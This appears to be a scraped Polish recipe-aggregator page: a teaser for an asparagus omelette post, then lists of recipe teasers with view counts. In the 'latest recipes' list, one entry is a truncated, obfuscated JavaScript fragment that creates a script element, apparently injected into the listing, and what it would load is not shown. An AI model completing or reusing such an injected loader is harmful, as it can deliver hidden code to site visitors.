Omlet ze szparagami wg Aleex
Źródło: http://kuchniaaleex.blogspot.com/2021/05/omlet-ze-szparagami-wg-aleex.html
Gdy w sklepach pojawiają się szparagi, pewne jest, że nieodwracalnie nadeszła wiosna. Sezon na te warzywa trwa od końca kwietnia do końca czerwca. Wtedy możemy kupić je na straganach w trzech kolorach: zielone, białe i fioletowe. To ten sam gatunek, a różnica w kolorze wynika z różnych sposobów uprawy. Najpopularniejsze są szparagi białe, uprawia się je u nas w Wielkopolsce....
Najnowsze przepisy
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 7
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 18
Domowy chleb z ziarnami – puszysty, aromatyczny i idealny... ⇖ 13
Serniki z PodkarpaciaPrzeglądając podkarpackie przepisy... ⇖ 21
Ta sałatka warstwowa z tuńczykiem to idealny przepis na... ⇖ 40
Przepisy z bloga
Po powolnym, nieco leniwym początku miesiąca, zaczął... ⇖ 566
Zaczął się listopad. Do końca roku pozostały tylko 2... ⇖ 764
Mija spokojna sobota. Lubię jej nieco leniwy rytm, kiedy... ⇖ 592
Przejęłam po mamie lepienie pierogów. Zawsze robiła to... ⇖ 1269
Nie wiem, jak powinnam nazwać te pierogi. Dawniej były to... ⇖ 698
W sezonie nie sposób ich nie zrobić chociaż raz. Tym... ⇖ 822
Rzadko mam czas na oglądanie telewizji. Najczęściej... ⇖ 550
Ziemniaki Hasselback lub Potato à la Hasselbacken to... ⇖ 557
Jeszcze raz wstawiam post z 6.09.2022 r., który przez... ⇖ 718
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1810
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1184
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 696
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 679
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 565
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 490
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 481
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 466









































